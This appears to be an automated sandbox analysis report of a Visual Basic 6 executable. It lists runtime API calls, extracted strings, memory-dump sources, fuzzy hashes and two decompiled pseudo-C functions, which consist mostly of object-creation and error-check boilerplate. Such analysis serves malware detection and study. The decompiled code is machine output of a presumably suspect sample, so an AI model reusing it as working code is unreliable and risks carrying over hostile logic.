__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000060,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002), ref: 00421A58
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?), ref: 00421A82
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?), ref: 00421A8A
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?), ref: 00421AB7
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?), ref: 00421ACB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404AF0,000002B0,?,?,?,?,?,?,?,?,18:18:18,00008008,?,?), ref: 00421B0E
__vbaFreeStr.MSVBVM60(00421B93,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421B6D
__vbaFreeStr.MSVBVM60(00421B93,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421B75
__vbaFreeStr.MSVBVM60(00421B93,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421B7D
__vbaFreeStr.MSVBVM60(00421B93,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421B85
__vbaFreeStr.MSVBVM60(00421B93,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421B8D

Strings

var, xrefs: 004218F3
18:18:18, xrefs: 00421964
Sorthavsrejser, xrefs: 00421615

Memory Dump Source

Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$Ary1ChkstkDerefNew2$CopyList$#515#541#665#685#704EraseRedim
String ID: 18:18:18$Sorthavsrejser$var
API String ID: 3646068646-768722070
Opcode ID: aa2e36a0969282d77c09057e0e3d4da483c3e695c97158bf2ecd20135c3d0906
Instruction ID: 7ebd92687b67457ac3d79f5ff282436b014bd516f09ae7be184ea8395d562111
Opcode Fuzzy Hash: aa2e36a0969282d77c09057e0e3d4da483c3e695c97158bf2ecd20135c3d0906
Instruction Fuzzy Hash: 20220971A002289FDF21EF91DC45BDDB7B4BF14304F5081AAE109B72A1DB795A89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC9F, Relevance: 80.9, APIs: 44, Strings: 2, Instructions: 374
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041FC9F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _v32;
				short _v36;
				short _v40;
				intOrPtr _v44;
				short _v48;
				char _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				char _v112;
				intOrPtr _v120;
				intOrPtr _v128;
				char* _v136;
				char _v144;
				void* _v148;
				void* _v152;
				signed int _v156;
				void* _v160;
				signed int _v164;
				signed int _v172;
				intOrPtr* _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				intOrPtr* _v216;
				signed int _v220;
				signed int _v224;
				short _t184;
				char* _t190;
				signed int _t196;
				signed int _t201;
				signed int _t208;
				signed int _t213;
				signed int _t221;
				signed int _t226;
				char* _t231;
				signed int _t235;
				signed int _t245;
				intOrPtr _t281;
				signed int _t291;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t281;
				L00401530();
				_v12 = _t281;
				_v8 = 0x401490;
				_v68 = 1;
				_v76 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v76);
				L00401650();
				L00401752();
				L00401794();
				_v68 = 0xe;
				_v76 = 2;
				_push( &_v76);
				_push( &_v92);
				L0040164A();
				_v136 = L"Out of string space";
				_v144 = 0x8008;
				_push( &_v92);
				_t184 =  &_v144;
				_push(_t184);
				L00401704();
				_v152 = _t184;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L004017A0();
				if(_v152 != 0) {
					_v68 = 1;
					_v76 = 2;
					_push(0);
					_push( &_v76);
					L00401644();
					L00401752();
					L00401794();
					if( *0x425698 != 0) {
						_v176 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v176 = 0x425698;
					}
					_v152 =  *_v176;
					_t221 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v60);
					asm("fclex");
					_v156 = _t221;
					if(_v156 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v152);
						_push(_v156);
						L004017B8();
						_v180 = _t221;
					}
					_v160 = _v60;
					_t226 =  *((intOrPtr*)( *_v160 + 0x140))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t226;
					if(_v164 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x4050a8);
						_push(_v160);
						_push(_v164);
						L004017B8();
						_v184 = _t226;
					}
					_v36 = _v148;
					L0040178E();
					if( *0x425010 != 0) {
						_v188 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v188 = 0x425010;
					}
					_t231 =  &_v60;
					L004017C4();
					_v152 = _t231;
					_t235 =  *((intOrPtr*)( *_v152 + 0x140))(_v152,  &_v56, _t231,  *((intOrPtr*)( *((intOrPtr*)( *_v188)) + 0x30c))( *_v188));
					asm("fclex");
					_v156 = _t235;
					if(_v156 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x405038);
						_push(_v152);
						_push(_v156);
						L004017B8();
						_v192 = _t235;
					}
					if( *0x425698 != 0) {
						_v196 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v196 = 0x425698;
					}
					_v160 =  *_v196;
					_v172 = _v56;
					_v56 = _v56 & 0x00000000;
					_v68 = _v172;
					_v76 = 8;
					_v120 = 0x37;
					_v128 = 2;
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t245 =  *((intOrPtr*)( *_v160 + 0x38))(_v160, 0x10, 0x10,  &_v92);
					asm("fclex");
					_v164 = _t245;
					_t291 = _v164;
					if(_t291 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x405068);
						_push(_v160);
						_push(_v164);
						L004017B8();
						_v200 = _t245;
					}
					_push( &_v92);
					_push( &_v112);
					L0040171C();
					_push( &_v112);
					_push( &_v52);
					L00401722();
					L0040178E();
					_push( &_v92);
					_push( &_v76);
					_push(2);
					L004017A0();
				}
				L0040163E();
				L004016EC();
				asm("fcomp qword [0x401480]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t291 != 0) {
					if( *0x425698 != 0) {
						_v204 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v204 = 0x425698;
					}
					_v152 =  *_v204;
					_t196 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v60);
					asm("fclex");
					_v156 = _t196;
					if(_v156 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v152);
						_push(_v156);
						L004017B8();
						_v208 = _t196;
					}
					_v160 = _v60;
					_t201 =  *((intOrPtr*)( *_v160 + 0x140))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t201;
					if(_v164 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x4050a8);
						_push(_v160);
						_push(_v164);
						L004017B8();
						_v212 = _t201;
					}
					_v40 = _v148;
					L0040178E();
					if( *0x425698 != 0) {
						_v216 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v216 = 0x425698;
					}
					_v152 =  *_v216;
					_t208 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v60);
					asm("fclex");
					_v156 = _t208;
					if(_v156 >= 0) {
						_v220 = _v220 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v152);
						_push(_v156);
						L004017B8();
						_v220 = _t208;
					}
					_v160 = _v60;
					_t213 =  *((intOrPtr*)( *_v160 + 0x108))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t213;
					if(_v164 >= 0) {
						_v224 = _v224 & 0x00000000;
					} else {
						_push(0x108);
						_push(0x4050a8);
						_push(_v160);
						_push(_v164);
						L004017B8();
						_v224 = _t213;
					}
					_v48 = _v148;
					L0040178E();
					L004016C2();
				}
				_push(1);
				_push(1);
				_push(1);
				_push( &_v76);
				L00401638();
				_push( &_v76);
				L00401728();
				L00401752();
				L00401794();
				_v44 =  *0x401478;
				asm("wait");
				_push(0x4202eb);
				L00401740();
				L00401740();
				L00401740();
				_t190 =  &_v52;
				_push(_t190);
				_push(0);
				L004016BC();
				return _t190;
			}

0x0041fca4
0x0041fcaf
0x0041fcb0
0x0041fcbc
0x0041fcc4
0x0041fcc7
0x0041fcce
0x0041fcd5
0x0041fcdc
0x0041fcde
0x0041fce0
0x0041fce2
0x0041fce7
0x0041fce8
0x0041fcf2
0x0041fcfa
0x0041fcff
0x0041fd06
0x0041fd10
0x0041fd14
0x0041fd15
0x0041fd1a
0x0041fd24
0x0041fd31
0x0041fd32
0x0041fd38
0x0041fd39
0x0041fd3e
0x0041fd48
0x0041fd4c
0x0041fd4d
0x0041fd4f
0x0041fd60
0x0041fd66
0x0041fd6d
0x0041fd74
0x0041fd79
0x0041fd7a
0x0041fd84
0x0041fd8c
0x0041fd98
0x0041fdb5
0x0041fd9a
0x0041fd9a
0x0041fd9f
0x0041fda4
0x0041fda9
0x0041fda9
0x0041fdc7
0x0041fddf
0x0041fde2
0x0041fde4
0x0041fdf1
0x0041fe13
0x0041fdf3
0x0041fdf3
0x0041fdf5
0x0041fdfa
0x0041fe00
0x0041fe06
0x0041fe0b
0x0041fe0b
0x0041fe1d
0x0041fe38
0x0041fe3e
0x0041fe40
0x0041fe4d
0x0041fe72
0x0041fe4f
0x0041fe4f
0x0041fe54
0x0041fe59
0x0041fe5f
0x0041fe65
0x0041fe6a
0x0041fe6a
0x0041fe80
0x0041fe87
0x0041fe93
0x0041feb0
0x0041fe95
0x0041fe95
0x0041fe9a
0x0041fe9f
0x0041fea4
0x0041fea4
0x0041fed4
0x0041fed8
0x0041fedd
0x0041fef5
0x0041fefb
0x0041fefd
0x0041ff0a
0x0041ff2f
0x0041ff0c
0x0041ff0c
0x0041ff11
0x0041ff16
0x0041ff1c
0x0041ff22
0x0041ff27
0x0041ff27
0x0041ff3d
0x0041ff5a
0x0041ff3f
0x0041ff3f
0x0041ff44
0x0041ff49
0x0041ff4e
0x0041ff4e
0x0041ff6c
0x0041ff75
0x0041ff7b
0x0041ff85
0x0041ff88
0x0041ff8f
0x0041ff96
0x0041ffa4
0x0041ffae
0x0041ffaf
0x0041ffb0
0x0041ffb1
0x0041ffb5
0x0041ffbf
0x0041ffc0
0x0041ffc1
0x0041ffc2
0x0041ffd1
0x0041ffd4
0x0041ffd6
0x0041ffdc
0x0041ffe3
0x00420005
0x0041ffe5
0x0041ffe5
0x0041ffe7
0x0041ffec
0x0041fff2
0x0041fff8
0x0041fffd
0x0041fffd
0x0042000f
0x00420013
0x00420014
0x0042001c
0x00420020
0x00420021
0x00420029
0x00420031
0x00420035
0x00420036
0x00420038
0x0042003d
0x00420046
0x0042004b
0x00420050
0x00420056
0x00420058
0x00420059
0x00420066
0x00420083
0x00420068
0x00420068
0x0042006d
0x00420072
0x00420077
0x00420077
0x00420095
0x004200ad
0x004200b0
0x004200b2
0x004200bf
0x004200e1
0x004200c1
0x004200c1
0x004200c3
0x004200c8
0x004200ce
0x004200d4
0x004200d9
0x004200d9
0x004200eb
0x00420106
0x0042010c
0x0042010e
0x0042011b
0x00420140
0x0042011d
0x0042011d
0x00420122
0x00420127
0x0042012d
0x00420133
0x00420138
0x00420138
0x0042014e
0x00420155
0x00420161
0x0042017e
0x00420163
0x00420163
0x00420168
0x0042016d
0x00420172
0x00420172
0x00420190
0x004201a8
0x004201ab
0x004201ad
0x004201ba
0x004201dc
0x004201bc
0x004201bc
0x004201be
0x004201c3
0x004201c9
0x004201cf
0x004201d4
0x004201d4
0x004201e6
0x00420201
0x00420207
0x00420209
0x00420216
0x0042023b
0x00420218
0x00420218
0x0042021d
0x00420222
0x00420228
0x0042022e
0x00420233
0x00420233
0x00420249
0x00420250
0x00420255
0x00420255
0x0042025a
0x0042025c
0x0042025e
0x00420263
0x00420264
0x0042026c
0x0042026d
0x00420277
0x0042027f
0x0042028a
0x0042028d
0x0042028e
0x004202ca
0x004202d2
0x004202da
0x004202df
0x004202e2
0x004202e3
0x004202e5
0x004202ea

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 0041FCBC
#703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041FCE8
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041FCF2
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041FCFA
#652.MSVBVM60(?,00000002,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041FD15
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,00000002,00000002,000000FF), ref: 0041FD39
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FD4F
#705.MSVBVM60(00000002,00000000), ref: 0041FD7A
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041FD84
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041FD8C
__vbaNew2.MSVBVM60(00405078,00425698,00000002,00000000), ref: 0041FDA4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 0041FE06
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000140), ref: 0041FE65
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,00000140), ref: 0041FE87
__vbaNew2.MSVBVM60(00404358,00425010), ref: 0041FE9F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FED8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000140), ref: 0041FF22
__vbaNew2.MSVBVM60(00405078,00425698), ref: 0041FF49
__vbaChkstk.MSVBVM60(?), ref: 0041FFA4
__vbaChkstk.MSVBVM60(?), ref: 0041FFB5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000038), ref: 0041FFF8
__vbaVar2Vec.MSVBVM60(?,?), ref: 00420014
__vbaAryMove.MSVBVM60(?,?,?,?), ref: 00420021
__vbaFreeObj.MSVBVM60(?,?,?,?), ref: 00420029
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?), ref: 00420038
__vbaFPInt.MSVBVM60 ref: 00420046
__vbaFpR8.MSVBVM60 ref: 0042004B
__vbaNew2.MSVBVM60(00405078,00425698), ref: 00420072
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 004200D4
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000140), ref: 00420133
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,00000140), ref: 00420155
__vbaNew2.MSVBVM60(00405078,00425698), ref: 0042016D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 004201CF
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000108), ref: 0042022E
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,00000108), ref: 00420250
__vbaEnd.MSVBVM60(00000000,?,004050A8,00000108), ref: 00420255
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 00420264
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042026D
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 00420277
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001), ref: 0042027F
__vbaFreeStr.MSVBVM60(004202EB,?,?,00000001,00000001,00000001), ref: 004202CA
__vbaFreeStr.MSVBVM60(004202EB,?,?,00000001,00000001,00000001), ref: 004202D2
__vbaFreeStr.MSVBVM60(004202EB,?,?,00000001,00000001,00000001), ref: 004202DA
__vbaAryDestruct.MSVBVM60(00000000,?,004202EB,?,?,00000001,00000001,00000001), ref: 004202E5

Strings

7, xrefs: 0041FF8F
Out of string space, xrefs: 0041FD1A

Memory Dump Source

Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$Chkstk$List$#539#652#703#705DestructVar2
String ID: 7$Out of string space
API String ID: 1714640597-777009397
Opcode ID: 0ac1cc292009672928e3451a54c03b37b9af429992444c21cb64ab78aa9da231
Instruction ID: e33ed4fbffcdc685ebe28c04091bf73d932aca7a426ac200fdca0bb2db854297
Opcode Fuzzy Hash: 0ac1cc292009672928e3451a54c03b37b9af429992444c21cb64ab78aa9da231
Instruction Fuzzy Hash: 5D02E670A00228DFDB20DFA1DC45FDDB7B5AF05304F5041AAE109B72A2DB795A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00420D70, Relevance: 66.4, APIs: 44, Instructions: 415
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00420D70(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				short _v36;
				short _v40;
				void* _v44;
				short _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				void* _v112;
				signed int _v116;
				signed int _v120;
				void* _v124;
				signed int _v128;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v208;
				intOrPtr* _v212;
				signed int _v216;
				signed int _t233;
				signed int _t238;
				short _t239;
				char* _t240;
				signed int _t242;
				char* _t251;
				signed int _t257;
				signed int _t262;
				signed int _t269;
				signed int _t274;
				signed int _t281;
				signed int _t288;
				signed int _t293;
				signed int _t300;
				signed int _t305;
				short _t306;
				signed int _t309;
				intOrPtr _t341;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t341;
				L00401530();
				_v12 = _t341;
				_v8 = 0x4014c8;
				if( *0x425698 != 0) {
					_v148 = 0x425698;
				} else {
					_push(0x425698);
					_push(0x405078);
					L004017BE();
					_v148 = 0x425698;
				}
				_v116 =  *_v148;
				_t233 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v60);
				asm("fclex");
				_v120 = _t233;
				if(_v120 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x405068);
					_push(_v116);
					_push(_v120);
					L004017B8();
					_v152 = _t233;
				}
				_v124 = _v60;
				_t238 =  *((intOrPtr*)( *_v124 + 0xb8))(_v124,  &_v112);
				asm("fclex");
				_v128 = _t238;
				if(_v128 >= 0) {
					_v156 = _v156 & 0x00000000;
				} else {
					_push(0xb8);
					_push(0x4050a8);
					_push(_v124);
					_push(_v128);
					L004017B8();
					_v156 = _t238;
				}
				_t239 = _v112;
				_v48 = _t239;
				L0040178E();
				L0040161A();
				_v68 = _t239;
				_v76 = 8;
				_t240 =  &_v76;
				_push(_t240);
				L00401620();
				_v116 =  ~(0 | _t240 != 0x0000ffff);
				L00401794();
				if(_v116 != 0) {
					if( *0x425698 != 0) {
						_v160 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v160 = 0x425698;
					}
					_v116 =  *_v160;
					_t288 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v60);
					asm("fclex");
					_v120 = _t288;
					if(_v120 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v116);
						_push(_v120);
						L004017B8();
						_v164 = _t288;
					}
					_v124 = _v60;
					_t293 =  *((intOrPtr*)( *_v124 + 0xd0))(_v124,  &_v56);
					asm("fclex");
					_v128 = _t293;
					if(_v128 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0xd0);
						_push(0x4050a8);
						_push(_v124);
						_push(_v128);
						L004017B8();
						_v168 = _t293;
					}
					_v136 = _v56;
					_v56 = _v56 & 0x00000000;
					L00401752();
					L0040178E();
					if( *0x425698 != 0) {
						_v172 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v172 = 0x425698;
					}
					_v116 =  *_v172;
					_t300 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v60);
					asm("fclex");
					_v120 = _t300;
					if(_v120 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v116);
						_push(_v120);
						L004017B8();
						_v176 = _t300;
					}
					_v124 = _v60;
					_t305 =  *((intOrPtr*)( *_v124 + 0x70))(_v124,  &_v112);
					asm("fclex");
					_v128 = _t305;
					if(_v128 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x4050a8);
						_push(_v124);
						_push(_v128);
						L004017B8();
						_v180 = _t305;
					}
					_t306 = _v112;
					_v40 = _t306;
					L0040178E();
					L004016B0();
					_t309 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t306);
					asm("fclex");
					_v116 = _t309;
					if(_v116 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x404af0);
						_push(_a4);
						_push(_v116);
						L004017B8();
						_v184 = _t309;
					}
				}
				_v68 = 9;
				_v76 = 2;
				_t242 =  &_v76;
				_push(_t242);
				L00401614();
				L00401752();
				_push(_t242);
				_push(0x40628c);
				L00401716();
				asm("sbb eax, eax");
				_v116 =  ~( ~( ~_t242));
				L00401740();
				L00401794();
				if(_v116 != 0) {
					if( *0x425698 != 0) {
						_v188 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v188 = 0x425698;
					}
					_v116 =  *_v188;
					_t257 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v60);
					asm("fclex");
					_v120 = _t257;
					if(_v120 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v116);
						_push(_v120);
						L004017B8();
						_v192 = _t257;
					}
					_v124 = _v60;
					_t262 =  *((intOrPtr*)( *_v124 + 0x140))(_v124,  &_v112);
					asm("fclex");
					_v128 = _t262;
					if(_v128 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x4050a8);
						_push(_v124);
						_push(_v128);
						L004017B8();
						_v196 = _t262;
					}
					_v36 = _v112;
					L0040178E();
					if( *0x425698 != 0) {
						_v200 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v200 = 0x425698;
					}
					_v116 =  *_v200;
					_t269 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v60);
					asm("fclex");
					_v120 = _t269;
					if(_v120 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v116);
						_push(_v120);
						L004017B8();
						_v204 = _t269;
					}
					_v124 = _v60;
					_t274 =  *((intOrPtr*)( *_v124 + 0x130))(_v124,  &_v56);
					asm("fclex");
					_v128 = _t274;
					if(_v128 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x4050a8);
						_push(_v124);
						_push(_v128);
						L004017B8();
						_v208 = _t274;
					}
					_v140 = _v56;
					_v56 = _v56 & 0x00000000;
					L00401752();
					L0040178E();
					if( *0x425698 != 0) {
						_v212 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v212 = 0x425698;
					}
					_v116 =  *_v212;
					_t281 =  *((intOrPtr*)( *_v116 + 0x48))(_v116, 0xe1,  &_v56);
					asm("fclex");
					_v120 = _t281;
					if(_v120 >= 0) {
						_v216 = _v216 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405068);
						_push(_v116);
						_push(_v120);
						L004017B8();
						_v216 = _t281;
					}
					_v144 = _v56;
					_v56 = _v56 & 0x00000000;
					L00401752();
				}
				_v68 = 2;
				_v76 = 2;
				_push( &_v76);
				_push( &_v92);
				L0040160E();
				_push( &_v92);
				L00401728();
				L00401752();
				_push( &_v92);
				_t251 =  &_v76;
				_push(_t251);
				_push(2);
				L004017A0();
				_v24 = 0xc5232;
				asm("wait");
				_push(0x4213af);
				L00401740();
				L00401740();
				L00401740();
				L00401740();
				return _t251;
			}

0x00420d75
0x00420d80
0x00420d81
0x00420d8d
0x00420d95
0x00420d98
0x00420da6
0x00420dc3
0x00420da8
0x00420da8
0x00420dad
0x00420db2
0x00420db7
0x00420db7
0x00420dd5
0x00420de4
0x00420de7
0x00420de9
0x00420df0
0x00420e0c
0x00420df2
0x00420df2
0x00420df4
0x00420df9
0x00420dfc
0x00420dff
0x00420e04
0x00420e04
0x00420e16
0x00420e25
0x00420e2b
0x00420e2d
0x00420e34
0x00420e53
0x00420e36
0x00420e36
0x00420e3b
0x00420e40
0x00420e43
0x00420e46
0x00420e4b
0x00420e4b
0x00420e5a
0x00420e5e
0x00420e65
0x00420e6a
0x00420e6f
0x00420e72
0x00420e79
0x00420e7c
0x00420e7d
0x00420e8d
0x00420e94
0x00420e9f
0x00420eac
0x00420ec9
0x00420eae
0x00420eae
0x00420eb3
0x00420eb8
0x00420ebd
0x00420ebd
0x00420edb
0x00420eea
0x00420eed
0x00420eef
0x00420ef6
0x00420f12
0x00420ef8
0x00420ef8
0x00420efa
0x00420eff
0x00420f02
0x00420f05
0x00420f0a
0x00420f0a
0x00420f1c
0x00420f2b
0x00420f31
0x00420f33
0x00420f3a
0x00420f59
0x00420f3c
0x00420f3c
0x00420f41
0x00420f46
0x00420f49
0x00420f4c
0x00420f51
0x00420f51
0x00420f63
0x00420f69
0x00420f76
0x00420f7e
0x00420f8a
0x00420fa7
0x00420f8c
0x00420f8c
0x00420f91
0x00420f96
0x00420f9b
0x00420f9b
0x00420fb9
0x00420fc8
0x00420fcb
0x00420fcd
0x00420fd4
0x00420ff0
0x00420fd6
0x00420fd6
0x00420fd8
0x00420fdd
0x00420fe0
0x00420fe3
0x00420fe8
0x00420fe8
0x00420ffa
0x00421009
0x0042100c
0x0042100e
0x00421015
0x00421031
0x00421017
0x00421017
0x00421019
0x0042101e
0x00421021
0x00421024
0x00421029
0x00421029
0x00421038
0x0042103c
0x00421043
0x0042104e
0x0042105c
0x0042105f
0x00421061
0x00421068
0x00421084
0x0042106a
0x0042106a
0x0042106c
0x00421071
0x00421074
0x00421077
0x0042107c
0x0042107c
0x00421068
0x0042108b
0x00421092
0x00421099
0x0042109c
0x0042109d
0x004210a7
0x004210ac
0x004210ad
0x004210b2
0x004210b9
0x004210bf
0x004210c6
0x004210ce
0x004210d9
0x004210e6
0x00421103
0x004210e8
0x004210e8
0x004210ed
0x004210f2
0x004210f7
0x004210f7
0x00421115
0x00421124
0x00421127
0x00421129
0x00421130
0x0042114c
0x00421132
0x00421132
0x00421134
0x00421139
0x0042113c
0x0042113f
0x00421144
0x00421144
0x00421156
0x00421165
0x0042116b
0x0042116d
0x00421174
0x00421193
0x00421176
0x00421176
0x0042117b
0x00421180
0x00421183
0x00421186
0x0042118b
0x0042118b
0x0042119e
0x004211a5
0x004211b1
0x004211ce
0x004211b3
0x004211b3
0x004211b8
0x004211bd
0x004211c2
0x004211c2
0x004211e0
0x004211ef
0x004211f2
0x004211f4
0x004211fb
0x00421217
0x004211fd
0x004211fd
0x004211ff
0x00421204
0x00421207
0x0042120a
0x0042120f
0x0042120f
0x00421221
0x00421230
0x00421236
0x00421238
0x0042123f
0x0042125e
0x00421241
0x00421241
0x00421246
0x0042124b
0x0042124e
0x00421251
0x00421256
0x00421256
0x00421268
0x0042126e
0x0042127b
0x00421283
0x0042128f
0x004212ac
0x00421291
0x00421291
0x00421296
0x0042129b
0x004212a0
0x004212a0
0x004212be
0x004212d2
0x004212d5
0x004212d7
0x004212de
0x004212fa
0x004212e0
0x004212e0
0x004212e2
0x004212e7
0x004212ea
0x004212ed
0x004212f2
0x004212f2
0x00421304
0x0042130a
0x00421317
0x00421317
0x0042131c
0x00421323
0x0042132d
0x00421331
0x00421332
0x0042133a
0x0042133b
0x00421345
0x0042134d
0x0042134e
